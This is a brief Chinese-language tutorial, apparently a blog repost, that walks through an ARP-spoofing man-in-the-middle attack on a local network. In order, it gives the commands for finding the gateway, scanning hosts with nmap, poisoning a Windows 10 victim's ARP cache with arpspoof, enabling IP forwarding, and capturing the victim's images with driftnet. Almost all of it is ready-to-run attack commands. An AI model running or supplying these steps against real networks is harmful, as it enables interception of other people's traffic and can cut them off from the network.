目錄

1.找到網關IP

2.掃描局域網內的主機

3.進行ARP欺騙

4.開啟端口轉發(fā)

5.使用driftnet進行圖片嗅探

---

ARP欺騙：

ARP欺騙（ARP spoofing），又稱ARP毒化（ARP poisoning，網絡上多譯為ARP病毒）或ARP攻擊，是針對以太網地址解析協(xié)議（ARP）的一種攻擊技術，通過欺騙局域網內訪問者PC的網關MAC地址，使訪問者PC錯以為攻擊者更改后的MAC地址是網關的MAC，導致網絡不通。此種攻擊可讓攻擊者獲取局域網上的數(shù)據(jù)包甚至可篡改數(shù)據(jù)包，且可讓網絡上特定計算機或所有計算機無法正常連線。

環(huán)境：

kali:10.xx.xx.2? ? win10:10.xx.xx.189

1.找到網關IP

# route -n

2.掃描局域網內的主機

nmap 10.xx.xx.0/24

3.進行ARP欺騙

# arpspoof -i eth0 -t 10.xx.xx.1 10.xx.xx.189 //arpspoof -i 網卡 -t 目標網關 目標主機

?此時目標主機將無法訪問網絡

4.開啟端口轉發(fā)

# echo 1 > /proc/sys/net/ipv4/ip_forward //kali linux默認是不開啟ip轉發(fā)的，所以我們這里手動開啟，關于ip轉發(fā)的配置文件寫在/proc/sys/net/ipv4的ip_forward中，默認為0（不轉發(fā)），我們改成1（為1的話目標不會斷網）

5.使用driftnet進行圖片嗅探

# driftnet -i eth0 //Driftnet是一個監(jiān)聽網絡流量并從它觀察到的TCP流中提取圖像的程序 # driftnet -i eth0 -a -d /root/lql 將嗅探到的圖片保存到/root/lql目錄下

?

總結

以上是生活随笔為你收集整理的局域网ARP欺骗的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。